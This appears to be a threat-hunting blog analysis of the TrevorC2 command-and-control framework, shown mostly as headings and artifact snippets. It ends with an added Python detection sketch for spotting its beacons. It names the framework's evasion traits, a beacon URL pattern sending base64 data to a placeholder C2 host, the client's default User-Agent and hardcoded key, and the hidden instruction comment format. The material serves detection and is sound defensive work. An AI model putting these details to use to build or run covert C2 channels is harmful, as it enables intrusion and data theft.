Understanding & Detecting C2 Frameworks — TrevorC2

Introduction

TrevorC2

TrevorC2 is a client/server model for masking command and control traffic behind a normally browsable website. Detection becomes much harder because the check-in intervals vary and the client does not use POST requests for data exfiltration.

General Flow

trevorc2_server.py

Configuration Constants
“Main” Function
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
clone_site/index.html
“main_c2” Function
RPQ Class
Server: IIS
{
'ztNZPDhjQXknRNu':'9x2Iq4rEqFqpAu12zQ+nkEFy9Dgc7nJuo5LZYt8STGs=',
'ZPHerPsYMHBByWd':'Vtnxa5nKPd56iwaYnC4R9LZQYL5BsSTl1w8fFbAq6dQ='
}
<meta http-equiv="Refresh" content="0; url=[Original URL]" />
Response from C2 when redirection is enabled
<!-- [STUB]=[Instructions] --></body>
Response from C2 containing instructions to execute by the client
SPQ Class
Page not found.
http(s)://[C2_IP]/images?guid=[Base64_Encoded_String]
Check against “magic_hostname”
Else branch
clone_site/received_[CLIENT_COOKIE].txt
UnknownPageHandler Class
Server Version

trevorc2_client.py

Client Constants
“connect_trevor” Function
Tr3v0rC2R0x@nd1s@w350m3#TrevorForget
"magic_hostname=" + [Machine Hostname]
Request to register client with C2
Server Response
Message on the command line
Main callback flow
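An added detection sketch (not code from the article or from TrevorC2 itself) that applies the artifacts described above to constructed web-proxy log lines and an HTML body: it flags /images?guid=<base64> requests and the default client User-Agent, and extracts the STUB=payload comment that the server places just before </body>. The log line format, the 203.0.113.10 address and the guid blob are assumptions made for this example.

```python
import re
import base64
from urllib.parse import urlparse

# Default client User-Agent and the beacon URL shape described in the article.
TREVOR_UA = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
# Assumed proxy log format (constructed for this example): METHOD URL UA="..."
LOG_RE = re.compile(r'^(?P<method>\w+) (?P<url>\S+) UA="(?P<ua>[^"]*)"$')
# Hidden instruction comment placed right before </body>: <!-- STUB=PAYLOAD -->
STUB_RE = re.compile(r"<!--\s*(?P<stub>[^=\s]+)=(?P<payload>[^>]*?)\s*-->\s*</body>")

# Constructed sample lines; the guid blob is an opaque made-up value.
SAMPLE_LOG = [
    'GET http://203.0.113.10/images?guid=kQ7m2Zr1xXh8pF3tLw0bVcYd9uEaN6sG5jH4oP8iRq0= UA="%s"' % TREVOR_UA,
    'GET http://203.0.113.10/ UA="%s"' % TREVOR_UA,
    'GET http://example.org/images?guid=12345 UA="Mozilla/5.0 (X11; Linux x86_64) Firefox/118.0"',
]

def looks_base64(value: str) -> bool:
    """True when value is well-formed base64 long enough to carry an encrypted blob."""
    if len(value) < 16 or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return True

def flag_request(line: str) -> list:
    """Return the TrevorC2 indicators present in one log line (empty list if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlparse(m["url"])
    # Split by hand rather than parse_qs so '+' inside the base64 blob survives.
    guid = url.query.partition("guid=")[2].split("&")[0]
    hits = []
    if url.path.endswith("/images") and looks_base64(guid):
        hits.append("images_guid_base64")
    if m["ua"] == TREVOR_UA:  # weak alone (a real IE11 UA), strong combined with the above
        hits.append("default_user_agent")
    return hits

def extract_hidden_stub(html: str):
    """Return (stub, payload) from the comment before </body>, or None on a clean page."""
    m = STUB_RE.search(html)
    return (m["stub"], m["payload"]) if m else None
```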

Conclusion

Indicators

MITRE ATT&CK

I write about #Detection #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.

Nasreddine Bencherchali